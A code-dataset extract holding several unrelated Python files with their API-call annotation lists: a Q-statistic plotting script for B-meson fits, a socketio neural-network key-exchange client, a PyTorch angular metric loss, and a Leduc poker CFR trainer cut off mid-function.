7168), 'numpy.sum', 'np.sum', (['(t * p)'], {}), '(t * p)\n', (7161, 7168), True, 'import numpy as np\n'), ((8029, 8077), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8061, 8077), False, 'from tensorflow import keras\n'), ((8159, 8207), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8191, 8207), False, 'from tensorflow import keras\n'), ((511, 544), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (533, 544), False, 'from tensorflow import keras\n'), ((7841, 7872), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['intersection'], {}), '(intersection)\n', (7858, 7872), False, 'from tensorflow import keras\n'), ((7886, 7913), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_true_f'], {}), '(y_true_f)\n', (7903, 7913), False, 'from tensorflow import keras\n'), ((7916, 7943), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_pred_f'], {}), '(y_pred_f)\n', (7933, 7943), False, 'from tensorflow import keras\n')]
|
#!/usr/bin/env python
"""Plot Q test statistics"""
import argparse
import csv
import math
import matplotlib
import numpy as np
import shutil
import tensorflow.compat.v2 as tf
import b_meson_fit as bmf
tf.enable_v2_behavior()
def read_q_stats(csv_path):
"""Return list of Q stats from file"""
q_list = []
with open(csv_path, newline='') as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
q_list.append(float(row['q']))
return q_list
def gaussian(x_list_, data):
data_max = max(data)
x = np.sum(x_list_ * data) / np.sum(data)
width = np.sqrt(np.abs(np.sum((x_list_ - x) ** 2 * data) / np.sum(data)))
return data_max * np.exp(-(x_list_ - x) ** 2 / (2 * width ** 2))
columns = shutil.get_terminal_size().columns
parser = argparse.ArgumentParser(
description='Plot Q test statistics.',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=columns, width=columns),
)
parser.add_argument(
'-b',
'--bins',
dest='bins',
type=int,
default=100,
help='Number of histogram bins (default: 100)',
)
parser.add_argument(
'-d',
'--device',
dest='device',
default=bmf.Script.device_default,
help='use this device e.g. CPU:0, GPU:0, GPU:1 (default: {})'.format(bmf.Script.device_default),
)
parser.add_argument(
'-w',
'--write-svg',
dest='write_svg',
metavar='SVG_PATH',
help='write plot as SVG using this filepath'
)
parser.add_argument(
dest='sm_filepath',
metavar='SM_FILEPATH',
help='Path to SM CSV file'
)
parser.add_argument(
dest='np_filepath',
metavar='NP_FILEPATH',
help='Path to NP CSV file'
)
args = parser.parse_args()
with bmf.Script(device=args.device) as script:
if args.write_svg is not None:
matplotlib.use('SVG')
# Import these after we optionally set SVG backend - otherwise matplotlib may bail on a missing TK backend when
# running from the CLI
import matplotlib.pylab as plt
import seaborn as sns
# Load data
sm_data = read_q_stats(args.sm_filepath)
np_data = read_q_stats(args.np_filepath)
# Max _/+ x-axis scale (Rounded up to nearest 25)
combined_data = sm_data + np_data
max_point = max(max(combined_data), -min(combined_data))
x_max = 25 * math.ceil(max_point / 25)
# Histogram bins to use
bins = np.linspace(-x_max, x_max, args.bins)
# Bin midpoints for x-axis
x_list = (bins[1:] + bins[:-1]) / 2
sm_hist = np.histogram(sm_data, bins=bins, density=True)
np_hist = np.histogram(np_data, bins=bins, density=True)
np_median = np.median(np_data)
sm_gaussian = gaussian(x_list, sm_hist[0])
# Calculate sigma confidence level
sm_mean = np.mean(sm_data)
sm_stddev = np.std(sm_data)
sigma_level = (sm_mean - np_median) / sm_stddev
bmf.stdout('mean: {} stddev: {} sigma level: {}'.format(sm_mean, sm_stddev, sigma_level))
plt.figure()
# Set style as well as font to Computer Modern Roman to match LaTeX output
sns.set(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm', 'axes.unicode_minus': False})
# Blue open circles for SM data. Don't plot 0 values
plt.scatter(
x_list,
[np.nan if x == 0 else x for x in sm_hist[0]],
facecolors='none',
edgecolors='b',
s=15,
label='SM'
)
# Red closed circles for NP data. Don't plot 0 values
plt.scatter(x_list, [np.nan if x == 0 else x for x in np_hist[0]], color='r', s=15, label='NP')
# Blue solid line for SM Gaussian
plt.plot(x_list, sm_gaussian, color='b', label='SM fit')
# Red dashed line for NP median
plt.gca().axvline(np_median, color='r', linestyle=':', label='NP median')
# Calculate the y-min by finding the y-axis order of magnitude just before the NP median, rounding down,
# and dropping 1 more order of magnitude
x_idx_just_before_np_median = len(list(filter(lambda x: x < np_median, x_list))) - 1
gaussian_val_just_before_np_median = sm_gaussian[x_idx_just_before_np_median]
val_mag_just_before_np_median = math.floor(math.log(gaussian_val_just_before_np_median, 10))
y_min = float('1e{}'.format(val_mag_just_before_np_median - 1))
# Calculate the y-max by finding the highest y-axis and rounding up to the next order of magnitude
max_fraction = max(sm_hist[0] + np_hist[0])
max_fraction_mag = math.ceil(math.log(max_fraction, 10))
y_max = float('1e{}'.format(max_fraction_mag))
bmf.stdout('Setting x scale from {} to {}'.format(-x_max, x_max))
plt.xlim(-x_max, x_max)
bmf.stdout('Setting y scale from {} to {}'.format(y_min, y_max))
plt.ylim(y_min, y_max)
plt.xlabel('Q')
plt.ylabel('Fraction / bin')
plt.yscale('log')
# Show legend in order NP, NP median, SM, SM fit
handles, labels = plt.gca().get_legend_handles_labels()
order = [3, 1, 2, 0]
plt.legend([handles[idx] for idx in order], [labels[idx] for idx in order])
if args.write_svg is not None:
filepath = args.write_svg
bmf.stdout('Writing {}'.format(filepath))
plt.savefig(filepath, format='svg', bbox_inches='tight')
else:
plt.show()
|
[
"numpy.sum",
"matplotlib.pylab.gca",
"numpy.histogram",
"numpy.mean",
"numpy.exp",
"matplotlib.pylab.figure",
"matplotlib.pylab.show",
"matplotlib.pylab.scatter",
"matplotlib.pylab.legend",
"numpy.std",
"shutil.get_terminal_size",
"argparse.HelpFormatter",
"numpy.linspace",
"math.log",
"seaborn.set",
"matplotlib.pylab.savefig",
"math.ceil",
"numpy.median",
"csv.DictReader",
"matplotlib.pylab.yscale",
"matplotlib.pylab.plot",
"matplotlib.use",
"matplotlib.pylab.xlim",
"matplotlib.pylab.ylim",
"matplotlib.pylab.ylabel",
"matplotlib.pylab.xlabel",
"b_meson_fit.Script",
"tensorflow.compat.v2.enable_v2_behavior"
] |
[((203, 226), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (224, 226), True, 'import tensorflow.compat.v2 as tf\n'), ((757, 783), 'shutil.get_terminal_size', 'shutil.get_terminal_size', ([], {}), '()\n', (781, 783), False, 'import shutil\n'), ((1722, 1752), 'b_meson_fit.Script', 'bmf.Script', ([], {'device': 'args.device'}), '(device=args.device)\n', (1732, 1752), True, 'import b_meson_fit as bmf\n'), ((2379, 2416), 'numpy.linspace', 'np.linspace', (['(-x_max)', 'x_max', 'args.bins'], {}), '(-x_max, x_max, args.bins)\n', (2390, 2416), True, 'import numpy as np\n'), ((2504, 2550), 'numpy.histogram', 'np.histogram', (['sm_data'], {'bins': 'bins', 'density': '(True)'}), '(sm_data, bins=bins, density=True)\n', (2516, 2550), True, 'import numpy as np\n'), ((2565, 2611), 'numpy.histogram', 'np.histogram', (['np_data'], {'bins': 'bins', 'density': '(True)'}), '(np_data, bins=bins, density=True)\n', (2577, 2611), True, 'import numpy as np\n'), ((2628, 2646), 'numpy.median', 'np.median', (['np_data'], {}), '(np_data)\n', (2637, 2646), True, 'import numpy as np\n'), ((2748, 2764), 'numpy.mean', 'np.mean', (['sm_data'], {}), '(sm_data)\n', (2755, 2764), True, 'import numpy as np\n'), ((2781, 2796), 'numpy.std', 'np.std', (['sm_data'], {}), '(sm_data)\n', (2787, 2796), True, 'import numpy as np\n'), ((2948, 2960), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (2958, 2960), True, 'import matplotlib.pylab as plt\n'), ((3044, 3144), 'seaborn.set', 'sns.set', ([], {'style': '"""ticks"""', 'font': '"""cmr10"""', 'rc': "{'mathtext.fontset': 'cm', 'axes.unicode_minus': False}"}), "(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm',\n 'axes.unicode_minus': False})\n", (3051, 3144), True, 'import seaborn as sns\n'), ((3203, 3328), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in sm_hist[0]]'], {'facecolors': '"""none"""', 'edgecolors': '"""b"""', 's': '(15)', 'label': '"""SM"""'}), "(x_list, [(np.nan if x == 0 else x) for x in sm_hist[0]],\n facecolors='none', edgecolors='b', s=15, label='SM')\n", (3214, 3328), True, 'import matplotlib.pylab as plt\n'), ((3440, 3542), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in np_hist[0]]'], {'color': '"""r"""', 's': '(15)', 'label': '"""NP"""'}), "(x_list, [(np.nan if x == 0 else x) for x in np_hist[0]], color=\n 'r', s=15, label='NP')\n", (3451, 3542), True, 'import matplotlib.pylab as plt\n'), ((3579, 3635), 'matplotlib.pylab.plot', 'plt.plot', (['x_list', 'sm_gaussian'], {'color': '"""b"""', 'label': '"""SM fit"""'}), "(x_list, sm_gaussian, color='b', label='SM fit')\n", (3587, 3635), True, 'import matplotlib.pylab as plt\n'), ((4582, 4605), 'matplotlib.pylab.xlim', 'plt.xlim', (['(-x_max)', 'x_max'], {}), '(-x_max, x_max)\n', (4590, 4605), True, 'import matplotlib.pylab as plt\n'), ((4679, 4701), 'matplotlib.pylab.ylim', 'plt.ylim', (['y_min', 'y_max'], {}), '(y_min, y_max)\n', (4687, 4701), True, 'import matplotlib.pylab as plt\n'), ((4706, 4721), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['"""Q"""'], {}), "('Q')\n", (4716, 4721), True, 'import matplotlib.pylab as plt\n'), ((4726, 4754), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['"""Fraction / bin"""'], {}), "('Fraction / bin')\n", (4736, 4754), True, 'import matplotlib.pylab as plt\n'), ((4759, 4776), 'matplotlib.pylab.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (4769, 4776), True, 'import matplotlib.pylab as plt\n'), ((4920, 4995), 'matplotlib.pylab.legend', 'plt.legend', (['[handles[idx] for idx in order]', '[labels[idx] for idx in order]'], {}), '([handles[idx] for idx in order], [labels[idx] for idx in order])\n', (4930, 4995), True, 'import matplotlib.pylab as plt\n'), ((382, 406), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (396, 406), False, 'import csv\n'), ((560, 582), 'numpy.sum', 'np.sum', (['(x_list_ * data)'], {}), '(x_list_ * data)\n', (566, 582), True, 'import numpy as np\n'), ((585, 597), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (591, 597), True, 'import numpy as np\n'), ((698, 744), 'numpy.exp', 'np.exp', (['(-(x_list_ - x) ** 2 / (2 * width ** 2))'], {}), '(-(x_list_ - x) ** 2 / (2 * width ** 2))\n', (704, 744), True, 'import numpy as np\n'), ((1807, 1828), 'matplotlib.use', 'matplotlib.use', (['"""SVG"""'], {}), "('SVG')\n", (1821, 1828), False, 'import matplotlib\n'), ((2313, 2338), 'math.ceil', 'math.ceil', (['(max_point / 25)'], {}), '(max_point / 25)\n', (2322, 2338), False, 'import math\n'), ((4125, 4173), 'math.log', 'math.log', (['gaussian_val_just_before_np_median', '(10)'], {}), '(gaussian_val_just_before_np_median, 10)\n', (4133, 4173), False, 'import math\n'), ((4428, 4454), 'math.log', 'math.log', (['max_fraction', '(10)'], {}), '(max_fraction, 10)\n', (4436, 4454), False, 'import math\n'), ((5124, 5180), 'matplotlib.pylab.savefig', 'plt.savefig', (['filepath'], {'format': '"""svg"""', 'bbox_inches': '"""tight"""'}), "(filepath, format='svg', bbox_inches='tight')\n", (5135, 5180), True, 'import matplotlib.pylab as plt\n'), ((5199, 5209), 'matplotlib.pylab.show', 'plt.show', ([], {}), '()\n', (5207, 5209), True, 'import matplotlib.pylab as plt\n'), ((902, 972), 'argparse.HelpFormatter', 'argparse.HelpFormatter', (['prog'], {'max_help_position': 'columns', 'width': 'columns'}), '(prog, max_help_position=columns, width=columns)\n', (924, 972), False, 'import argparse\n'), ((3677, 3686), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (3684, 3686), True, 'import matplotlib.pylab as plt\n'), ((4853, 4862), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (4860, 4862), True, 'import matplotlib.pylab as plt\n'), ((625, 658), 'numpy.sum', 'np.sum', (['((x_list_ - x) ** 2 * data)'], {}), '((x_list_ - x) ** 2 * data)\n', (631, 658), True, 'import numpy as np\n'), ((661, 673), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (667, 673), True, 'import numpy as np\n')]
|
# from socketIO_client import SocketIO, LoggingNamespace
import sys
import socketio
import numpy as np
import math
from random import randrange
sio = socketio.Client()
@sio.on('receive_chaos_output2')
def on_message(msg):
if msg['output'] == tpmclient.tpm.chaosmap():
tpmclient.IsSync = True
print('SUCCESS: synched with Bob')
sio.disconnect()
tpmclient.save_key()
# save key to KEYS
@sio.on('receive_chaos_output')
def on_message(msg):
sio.emit('confirm_chaos_output',
{
'msg':'sending chaos output',
'output': tpmclient.tpm.chaosmap(),
'sid': tpmclient.partner_sid
}
)
if msg['output'] == tpmclient.tpm.chaosmap():
tpmclient.IsSync = True
print('SUCCESS: synched with Alice')
sio.disconnect()
tpmclient.save_key()
# save key to KEYS
@sio.on('output_received')
def on_message(msg):
if tpmclient.tpm.out == msg['output']:
tpmclient.tpm.update_weights(msg['output'])
if tpmclient.n >= 200:
if tpmclient.n % 10 == 0:
tpmclient.send_chaos_output()
if not tpmclient.IsSync:
tpmclient.send_vector_and_output()
# print("output received", + msg['output'])
animation.update()
@sio.on('get_weights')
def on_message(msg):
try:
vector = msg['vector']
list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)]
tpmclient.receive_vector(list_vec)
tpmclient.send_output()
if tpmclient.tpm.out == msg['output']:
tpmclient.tpm.update_weights(msg['output'])
# print("output received", + msg['output'])
animation.update()
except socketio.exceptions.BadNamespaceError:
pass
@sio.on('status')
def on_message(msg):
if 'assign Alice' in msg:
tpmclient.user = msg['assign Alice']
if 'assign Bob' in msg and not tpmclient.user:
tpmclient.user = msg['assign Bob']
if 'start' in msg:
if tpmclient.user == 'A':
tpmclient.partner_sid = msg["BSid"]
# print(' B sid is ' + tpmclient.partner_sid)
tpmclient.send_vector_and_output()
else:
tpmclient.partner_sid = msg["ASid"]
# print(' A sid is ' + tpmclient.partner_sid)
print("Partner's sid is: " + tpmclient.partner_sid)
# print('message from server: ' + msg['message'])
@sio.event
def connect():
sio.emit('my message', " Client connected", namespace='/')
sio.emit('join', {'channel': CHANNEL}, namespace='/')
print("Connected to server")
class TPMClient:
def __init__(self):
self.user = None
self.tpm = TPM(16, 16, 100)
self.n = 0
self.IsSync = False
def send_vector_and_output(self):
vector = self.rand_vec()
list_vec = [np.array(vector[x:x+16]) for x in range(0, len(vector), 16)]
self.tpm.get_output(list_vec)
sio.emit('weights',
{
'msg':'sending random vector and output',
'vector': vector,
'output': self.tpm.out,
'sid': tpmclient.partner_sid
}
)
self.n += 1
def receive_vector(self, vector_):
vec = [np.array(x) for x in vector_]
self.tpm.get_output(vec)
def rand_vec(self):
l = []
for i in range(256):
l.append(randrange(-100, 100))
return l
def send_output(self):
sio.emit('send_output',
{
'msg':'sending output',
'output': self.tpm.out,
'sid': tpmclient.partner_sid
}
)
def send_chaos_output(self):
sio.emit('send_chaos_output',
{
'msg':'sending chaos output',
'output': self.tpm.chaosmap(),
'sid': tpmclient.partner_sid
}
)
def save_key(self):
re = [abs(item+155) for sublist in self.tpm.weights for item in sublist]
key = bytes(abs(x) for x in re).decode('cp437')
with open("KEYS/{}.txt".format(CHANNEL), "w") as text_file:
print(key, file=text_file)
class TPM:
def __init__(self, k_, n_, l_):
self.k = k_
self.n = n_
self.l = l_
self.weights = self.initialize_w()
self.inputs = None
self.H = np.zeros(self.k)
self.out = None
self.X = None
def get_output(self, input_):
self.X = input_
self.out = 1
for i in range(self.k):
self.H[i] = self.signum(np.dot(input_[i], self.weights[i]))
self.out *= self.signum(np.dot(input_[i], self.weights[i]))
def initialize_w(self):
p = []
for i in range(self.k):
p.append(np.random.randint(-self.l, self.l, size=self.n))
return p
def signum(self, x):
return math.copysign(1, x)
def update_weights(self, outputB):
for i in range(self.k):
for j in range(self.n):
self.weights[i][j] += self.X[i][j] * self.out * self.isequal(self.out, self.H[i]) * self.isequal(self.out, outputB)
self.weights[i][j] = self.g(self.weights[i][j])
def isequal(self, A, B):
if A==B:
return 1.0
else:
return 0.0
def g(self, w):
if w > self.l:
return self.l
if w < -self.l:
return -self.l
else:
return w
def chaosmap(self):
r = sum(list(np.hstack(self.weights)))
rr = sum([abs(x) for x in (list(np.hstack(self.weights)))])
t = float(abs(r)) / float(rr)
x = t
for i in range(rr):
x = (3.6 + t/2)* x *(1 - x)
return x
class Animation:
def __init__(self):
self.animation = [
"Synchronizing [ ]",
"Synchronizing [= ]",
"Synchronizing [=== ]",
"Synchronizing [==== ]",
"Synchronizing. [===== ]",
"Synchronizing. [====== ]",
"Synchronizing. [======= ]",
"Synchronizing. [========]",
"Synchronizing.. [ =======]",
"Synchronizing.. [ ======]",
"Synchronizing.. [ =====]",
"Synchronizing.. [ ====]",
"Synchronizing...[ ===]",
"Synchronizing...[ ==]",
"Synchronizing...[ =]",
"Synchronizing...[ ]",
"Synchronizing [ ]"]
self.i = 0
self.timer = None
def update(self):
print(self.animation[self.i % len(self.animation)], end='\r')
self.i += 1
if __name__ == "__main__":
CHANNEL = sys.argv[1]
tpmclient = TPMClient()
animation = Animation()
# sio.connect('https://tpmserver.herokuapp.com/')
sio.connect('http://localhost:5000')
|
[
"socketio.Client",
"numpy.zeros",
"numpy.hstack",
"math.copysign",
"numpy.random.randint",
"numpy.array",
"random.randrange",
"numpy.dot"
] |
[((152, 169), 'socketio.Client', 'socketio.Client', ([], {}), '()\n', (167, 169), False, 'import socketio\n'), ((4404, 4420), 'numpy.zeros', 'np.zeros', (['self.k'], {}), '(self.k)\n', (4412, 4420), True, 'import numpy as np\n'), ((4928, 4947), 'math.copysign', 'math.copysign', (['(1)', 'x'], {}), '(1, x)\n', (4941, 4947), False, 'import math\n'), ((1398, 1424), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (1406, 1424), True, 'import numpy as np\n'), ((2858, 2884), 'numpy.array', 'np.array', (['vector[x:x + 16]'], {}), '(vector[x:x + 16])\n', (2866, 2884), True, 'import numpy as np\n'), ((3276, 3287), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (3284, 3287), True, 'import numpy as np\n'), ((3429, 3449), 'random.randrange', 'randrange', (['(-100)', '(100)'], {}), '(-100, 100)\n', (3438, 3449), False, 'from random import randrange\n'), ((4616, 4650), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4622, 4650), True, 'import numpy as np\n'), ((4688, 4722), 'numpy.dot', 'np.dot', (['input_[i]', 'self.weights[i]'], {}), '(input_[i], self.weights[i])\n', (4694, 4722), True, 'import numpy as np\n'), ((4821, 4868), 'numpy.random.randint', 'np.random.randint', (['(-self.l)', 'self.l'], {'size': 'self.n'}), '(-self.l, self.l, size=self.n)\n', (4838, 4868), True, 'import numpy as np\n'), ((5561, 5584), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5570, 5584), True, 'import numpy as np\n'), ((5628, 5651), 'numpy.hstack', 'np.hstack', (['self.weights'], {}), '(self.weights)\n', (5637, 5651), True, 'import numpy as np\n')]
|
import torch
import torch.nn as nn
import numpy as np
def Angular(margin):#angular mc
#https://github.com/ronekko/deep_metric_learning/blob/master/lib/functions/angular_loss.py
return AngularLoss(margin=margin)
class AngularLoss(nn.Module):
def __init__(self,margin):
super(AngularLoss, self).__init__()
self.margin = margin
def forward(self, embedding, label):
batch_size=embedding.size(0)
embed_anchor=embedding[0:batch_size//2,:]
embed_pos=embedding[batch_size//2:batch_size,:]
alpha = np.deg2rad(self.margin)
sq_tan_alpha = torch.tan(torch.from_numpy(alpha.reshape(1,1)).float().cuda()[0][0]) ** 2
n_pairs = embed_anchor.size()[0]
# first and second term of f_{a,p,n}
term1 = 4 * sq_tan_alpha * (embed_anchor + embed_pos).mm(embed_pos.transpose(0, 1))
term2 = 2 * (1 + sq_tan_alpha) * (embed_pos*embed_anchor).sum(dim=1)
f_apn = term1-term2.repeat(n_pairs,1)
mask = torch.ones(n_pairs,n_pairs)-torch.eye(n_pairs,n_pairs)
f_apn = f_apn*mask.cuda()
loss = f_apn.exp().sum(dim=1).log().mean()
return loss,0,0
|
[
"torch.ones",
"torch.eye",
"numpy.deg2rad"
] |
[((557, 580), 'numpy.deg2rad', 'np.deg2rad', (['self.margin'], {}), '(self.margin)\n', (567, 580), True, 'import numpy as np\n'), ((998, 1026), 'torch.ones', 'torch.ones', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1008, 1026), False, 'import torch\n'), ((1026, 1053), 'torch.eye', 'torch.eye', (['n_pairs', 'n_pairs'], {}), '(n_pairs, n_pairs)\n', (1035, 1053), False, 'import torch\n')]
|
#Library
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
import itertools
import doctest
import copy
import math
import wandb
from tqdm import tqdm
from collections import defaultdict
#Node Class
#information set node class definition
class Node:
#1 #Leduc_node_definitions
def __init__(self, NUM_ACTIONS, infoSet, num_players=2):
self.NUM_ACTIONS = NUM_ACTIONS
self.NUM_PLAYERS = num_players
self.infoSet = infoSet
self.c = 0
self.regretSum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.strategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.strategySum = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.possible_action = self.Get_possible_action_by_information_set()
self.Get_strategy_through_regret_matching()
def Get_possible_action_by_information_set(self): #{0:"f", 1:"c", 2:"r"}
"""return int
>>> Node(3, "JccKc").Get_possible_action_by_information_set()
array([1, 2])
>>> Node(3, "Jr").Get_possible_action_by_information_set()
array([0, 1, 2])
>>> Node(3, "JccJc").Get_possible_action_by_information_set()
array([1, 2])
>>> Node(3, "J").Get_possible_action_by_information_set()
array([1, 2])
"""
infoset_without_hand_card = self.infoSet[1:]
if LeducTrainer().card_num_check(infoset_without_hand_card) == 1:
private_cards, history_before, community_card, history_after = LeducTrainer().Split_history("??" + infoset_without_hand_card)
infoset_without_hand_card = history_after
if len(infoset_without_hand_card) == 0 or infoset_without_hand_card.count("r") == 0:
return np.array([1,2], dtype=int)
elif infoset_without_hand_card.count("r") == 1:
return np.array([0,1,2], dtype=int)
elif infoset_without_hand_card.count("r") == 2:
return np.array([0,1], dtype=int)
#regret-matching
def Get_strategy_through_regret_matching(self):
self.normalizingSum = 0
for a in self.possible_action:
self.strategy[a] = self.regretSum[a] if self.regretSum[a]>0 else 0
self.normalizingSum += self.strategy[a]
for a in self.possible_action:
if self.normalizingSum >0 :
self.strategy[a] /= self.normalizingSum
else:
self.strategy[a] = 1/len(self.possible_action)
# calculate average-strategy
def Get_average_information_set_mixed_strategy(self):
self.avgStrategy = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
self.normalizingSum = 0
for a in self.possible_action:
self.normalizingSum += self.strategySum[a]
for a in self.possible_action:
if self.normalizingSum >0 :
self.avgStrategy[a] = self.strategySum[a] / self.normalizingSum
else:
self.avgStrategy[a] = 1/len(self.possible_action)
return self.avgStrategy
# Leduc Trainer
class LeducTrainer:
def __init__(self, train_iterations=10, num_players = 2):
#f: FOLD, c: CALL , r:RAISE
self.train_iterations = train_iterations
self.NUM_PLAYERS = num_players
self.ACTION_DICT = {0:"f", 1:"c", 2:"r"}
self.NUM_ACTIONS = 3
self.nodeMap = defaultdict(list)
self.eval = None
self.card_rank = self.make_rank()
def make_rank(self):
"""return dict
>>> LeducTrainer(num_players=2).make_rank() == {"KK":6, "QQ":5, "JJ":4, "KQ":3, "QK":3, "KJ":2, "JK":2, "QJ":1, "JQ":1}
True
"""
card_deck = self.card_distribution()
card_unique = card_deck[::2]
card_rank = {}
count = (len(card_unique)-1)*len(card_unique) //2
for i in range(len(card_unique)-1,-1, -1):
for j in range(i-1, -1, -1):
card_rank[card_unique[i] + card_unique[j]] = count
card_rank[card_unique[j] + card_unique[i]] = count
count -= 1
count = (len(card_unique)-1)*len(card_unique) //2 +1
for i in range(len(card_unique)):
card_rank[card_unique[i] + card_unique[i]] = count
count += 1
return card_rank
def Rank(self, my_card, com_card):
"""return int
>>> LeducTrainer(num_players=2).Rank("J", "Q")
1
>>> LeducTrainer(num_players=2).Rank("Q", "J")
1
>>> LeducTrainer(num_players=2).Rank("K", "K")
6
"""
hand = my_card + com_card
return self.card_rank[hand]
def card_distribution(self):
"""return list
>>> LeducTrainer(num_players=2).card_distribution()
['J', 'J', 'Q', 'Q', 'K', 'K']
>>> LeducTrainer(num_players=3).card_distribution()
['T', 'T', 'J', 'J', 'Q', 'Q', 'K', 'K']
"""
card = ["2", "3", "4", "5", "6", "7", "8", "9", "T", "J", "Q", "K"]
card_deck = []
for i in range(self.NUM_PLAYERS+1):
card_deck.append(card[11-self.NUM_PLAYERS+i])
card_deck.append(card[11-self.NUM_PLAYERS+i])
return card_deck
def Split_history(self, history):
"""return history_before, history_after
>>> LeducTrainer(num_players=3).Split_history("JKQcccKcrcc")
('JKQ', 'ccc', 'K', 'crcc')
>>> LeducTrainer(num_players=2).Split_history("KQrrcQrrc")
('KQ', 'rrc', 'Q', 'rrc')
>>> LeducTrainer(num_players=2).Split_history("QQcrrcKcc")
('QQ', 'crrc', 'K', 'cc')
"""
for ai, history_ai in enumerate(history[self.NUM_PLAYERS:]):
if history_ai in self.card_distribution():
idx = ai+self.NUM_PLAYERS
community_catd = history_ai
return history[:self.NUM_PLAYERS], history[self.NUM_PLAYERS:idx], community_catd, history[idx+1:]
def action_history_player(self, history):
#target_player_iのaction 履歴
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)]
player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)]
f_count, a_count, raise_count = 0, 0, 0
card = self.card_distribution()
private_cards, history_before, community_card, history_after = self.Split_history(history)
for hi in history_before:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2
elif hi == "r" and raise_count == 1:
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4
a_count += 1
f_count, a_count, raise_count = 0, 0, 0
for hi in history_after:
if hi not in card:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round2)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 4
elif hi == "r" and raise_count == 1:
player_money_list_round2[(a_count + f_count)%self.NUM_PLAYERS] += 8
a_count += 1
return player_action_list, player_money_list_round1, player_money_list_round2, community_card
def action_player(self, history):
"""return int
>>> LeducTrainer().action_player("JJc")
1
>>> LeducTrainer().action_player("JQcr")
0
>>> LeducTrainer(num_players=3).action_player("JQTrfr")
0
"""
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
a_count = 0
f_count = 0
if self.card_num_check(history) == self.NUM_PLAYERS:
for hi in history[self.NUM_PLAYERS:]:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
a_count += 1
elif self.card_num_check(history) == self.NUM_PLAYERS+1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
for hi in history_after:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
a_count += 1
return (a_count + f_count)%self.NUM_PLAYERS
#6 Return payoff for terminal states #if terminal states return util
def Return_payoff_for_terminal_states(self, history, target_player_i):
"""return int
>>> int(LeducTrainer().Return_payoff_for_terminal_states("KQrf", 0))
1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKcrf", 0))
-1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrf", 0))
-3
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JJccQcc", 0))
0
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JKccQcc", 1))
1
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 0))
-7
>>> int(LeducTrainer().Return_payoff_for_terminal_states("JQcrcKcrc", 1))
7
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrf", 0))
-9
